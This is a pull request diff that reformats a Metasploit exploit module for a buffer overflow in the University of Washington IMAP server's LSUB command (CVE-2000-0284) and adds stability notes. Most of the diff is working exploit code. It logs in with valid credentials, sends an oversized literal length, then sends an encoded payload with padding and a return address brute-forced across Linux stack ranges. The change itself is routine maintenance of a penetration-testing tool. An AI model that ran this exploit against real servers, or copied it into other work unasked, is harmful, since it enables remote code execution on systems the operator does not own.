### PR TITLE
modules/exploits/linux/imap: Resolve RuboCop violations

### DIFF
--- a/modules/exploits/linux/imap/imap_uw_lsub.rb
+++ b/modules/exploits/linux/imap/imap_uw_lsub.rb
@@ -10,72 +10,77 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::Imap
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'UoW IMAP Server LSUB Buffer Overflow',
-      'Description'    => %q{
+    super(
+      update_info(
+        info,
+        'Name' => 'UoW IMAP Server LSUB Buffer Overflow',
+        'Description' => %q{
           This module exploits a buffer overflow in the 'LSUB'
-        command of the University of Washington IMAP service.
-        This vulnerability can only be exploited with a valid username
-        and password.
-      },
-      'Author'         => [ 'aushack', 'jduck' ],
-      'License'        => MSF_LICENSE,
-      'References'     =>
-        [
+          command of the University of Washington IMAP service.
+          This vulnerability can only be exploited with a valid username
+          and password.
+        },
+        'Author' => [ 'aushack', 'jduck' ],
+        'License' => MSF_LICENSE,
+        'References' => [
           [ 'CVE', '2000-0284' ],
           [ 'OSVDB', '12037' ],
           [ 'BID', '1110' ],
           [ 'EDB', '284' ]
         ],
-      'Privileged'     => false,
-      'Payload'        =>
-        {
-          'Space'    => 964,
+        'Privileged' => false,
+        'Payload' => {
+          'Space' => 964,
           'BadChars' => "\x00\x0a\x0d\x2f",
-          'StackAdjustment' => -3500,
+          'StackAdjustment' => -3500
         },
-      'Platform'       => 'linux',
-      'Targets'        =>
-        [
+        'Platform' => 'linux',
+        'Targets' => [
           # ['RedHat 6.2 - IMAP4rev1 v12.264', { 'Ret' => 0xbffff310 }],
-          [ 'Linux Bruteforce',
+          [
+            'Linux Bruteforce',
             {
-              'Platform'   => 'linux',
-              'Offset'     => 1064,
+              'Platform' => 'linux',
+              'Offset' => 1064,
               'Bruteforce' =>
                 {
                   'Start' => { 'Ret' => 0xbffffdfc },
-                  'Stop'  => { 'Ret' => 0xbfa00000 },
-                  'Step'  => 200
+                  'Stop' => { 'Ret' => 0xbfa00000 },
+                  'Step' => 200
                 }
             },
           ]
         ],
-      'DisclosureDate' => '2000-04-16',
-      'DefaultTarget' => 0))
+        'DisclosureDate' => '2000-04-16',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SERVICE_RESTARTS],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => [UNRELIABLE_SESSION]
+        }
+      )
+    )
   end
 
   def check
     connect
     disconnect
 
-    if (banner =~ /IMAP4rev1 v12\.264/)
-      return Exploit::CheckCode::Appears
+    if banner =~ /IMAP4rev1 v12\.264/
+      return CheckCode::Appears('IMAP4rev1 v12.264')
     end
-    return Exploit::CheckCode::Safe
 
+    CheckCode::Safe
   end
 
   def brute_exploit(addresses)
-    print_status("Trying 0x%.8x ..." % addresses['Ret'])
+    print_status('Trying 0x%.8x ...' % addresses['Ret'])
 
-    if (not connect_login)
-      fail_with(Failure::Unknown, "Unable to log in!")
-    end
+    fail_with(Failure::NoAccess, 'Unable to log in!') unless connect_login
 
     req = "a002 LSUB \"\" {%d}\r\n" % target['Offset']
     sock.put(req)
-    buf = sock.get_once
+    sock.get_once
 
     sploit = payload.encoded + rand_text_alphanumeric(64) + [addresses['Ret']].pack('V') + rand_text_alphanumeric(32) + "\r\n"
     sock.put(sploit)


### PR DESCRIPTION
All violations resolved with `rubocop -a`, except notes.

